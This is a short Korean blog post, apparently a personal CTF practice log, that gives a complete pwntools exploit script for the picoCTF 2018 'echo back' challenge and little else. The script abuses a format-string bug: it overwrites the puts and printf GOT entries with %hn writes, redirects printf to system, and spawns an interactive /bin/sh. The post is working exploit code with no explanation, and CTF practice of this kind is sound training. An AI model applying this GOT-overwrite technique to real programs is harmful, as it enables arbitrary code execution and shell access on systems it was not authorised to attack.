pico CTF 2018 echo back

System/Pwnable Practice 2019. 8. 12. 20:58

exploit.py

from pwn import *

p = process('./echoback')
e = ELF('./echoback')

vuln_low = 0x85ab
vuln_high = 0x10804
system_got_low = 0x8460
system_got_high = 0x10804
puts_got = e.got['puts']
printf_got = e.got['printf']

payload = p32(puts_got)
payload += p32(puts_got + 2)
payload += '%{}x'.format(vuln_low - 8)
payload += "%7$hn"
payload += '%{}x'.format(vuln_high - vuln_low)
payload += "%8$hn"
p.sendlineafter('\n', payload)

payload2 = p32(printf_got)
payload2 += p32(printf_got+2)
payload2 += "%{}x".format(system_got_low-8)
payload2 += "%7$hn"
payload2 += '%{}x'.format(system_got_high - system_got_low)
payload2 += "%8$hn"

p.sendlineafter("message:\n",payload2)
p.sendlineafter("message:\n","/bin/sh\x00")
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

TU CTF 2018 timber (0)	2019.08.12
picoCTF 2018 authenticate (0)	2019.08.10
TUCTF CTF 2018 Ehh (0)	2019.08.09
Plaid CTF 2015 ebp (0)	2019.08.06
Layer7 CTF 2018 Life Game (0)	2019.08.05

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

pico CTF 2018 echo back

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바